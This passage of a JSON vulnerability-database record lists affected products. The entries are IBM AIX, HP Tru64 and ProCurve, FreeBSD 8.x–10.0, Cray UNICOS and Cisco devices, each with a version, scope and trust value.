            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "aix l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tru64 b-2 pk4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tru64 b pk4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tru64 b pk3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tru64 a pk6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tru64 g pk4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "procurve switch 9315m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 9308m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 9304m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 8000m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 5372xl j4848a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 5348xl j4849a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 5308xl j4819a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 5304xl j4850a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4108gl-bundle",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4108gl j4865a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4108gl",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4000m j4121a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4000m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2525"
          },
          {
            "_id": null,
            "model": "procurve switch j4813a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2524"
          },
          {
            "_id": null,
            "model": "procurve switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2524"
          },
          {
            "_id": null,
            "model": "procurve switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2512"
          },
          {
            "_id": null,
            "model": "procurve switch 2424m j4093a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 2424m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 2400m j4122a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 2400m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 1600m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "ethertwist",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack switch 800t j3245a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3210a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3205a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3204a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3203a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3202a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3201a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "advancestack 10base-t switching hub j3200a a.03.07",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-release-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-rc3-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-rc2-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-rc2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-rc1-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-rc",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-prerelease",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-beta3-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-beta1-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-beta1-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-beta1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "9.2-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p9",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p8",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p7",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p5",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p3",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p11",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p10",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-rc3-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-rc2-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-rc2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-rc1-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "rc2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "rc1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.2-"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "9.1-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p7",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p3",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p18",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p17",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p16",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p15",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p14",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p12",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p11",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p10",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-rc2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1--releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "release-p5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "release-p4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "9.0-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.0-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.0-release-p6",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.0-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.0-rc3",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.0-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.0--releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "8.4-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p9",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p8",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p7",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p15",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p14",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p13",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p12",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p11",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-rc2-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-rc1-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-prerelease",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-beta1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "8.3-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-release-p8",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-release-p6",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-release-p16",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-release-p15",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-release-p14",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.3-release-p11",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "8.2-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.2-release-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.2-release-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.2-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "release -p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.2-"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "8.1-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.1-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.1-release-p5",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.1-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.1-release-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.1-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.1-prerelease",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "8.0-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.0-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.0-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "-release-p5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "8-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p8",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p7",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p6",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p5",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-rc3-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-rc2-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-rc1-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-beta",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "10"
          },
          {
            "_id": null,
            "model": "unicos/mp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "unicos/mp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cray",
            "version": null
          },
          {
            "_id": null,
            "model": "unicos/mk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "2.0.5.54"
          },
          {
            "_id": null,
            "model": "unicos/mk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "1.5.1"
          },
          {
            "_id": null,
            "model": "unicos/mk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "unicos max",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "1.3.5"
          },
          {
            "_id": null,
            "model": "unicos max",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "9.2.4"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "9.0.2.5"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "unicos e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "unicos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cray",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ws-x6624",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ws-x6608",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "wireless lan solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "wireless lan solution appliance",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "wgb340",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5008"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5002"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5001"
          },
          {
            "_id": null,
            "model": "voice manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "user registration tool vlan policy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.46"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "unity server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.7"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "sn5400 series storage routers",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-3.3.2-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-3.3.1-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-3.2.2-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-3.2.1-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-2.5.1-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-2-3.3.2-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router sn5428-2-3.3.1-k9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5428"
          },
          {
            "_id": null,
            "model": "sn storage router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "54201.1.3"
          },
          {
            "_id": null,
            "model": "sn storage router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "54201.1(7)"
          },
          {
            "_id": null,
            "model": "sn storage router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "54201.1(5)"
          },
          {
            "_id": null,
            "model": "sn storage router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "54201.1(4)"
          },
          {
            "_id": null,
            "model": "sn storage router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "54201.1(3)"
          },
          {
            "_id": null,
            "model": "sn storage router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "54201.1(2)"
          },
          {
            "_id": null,
            "model": "secure pix firewall",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "secure intrusion detection system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3(3.109)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
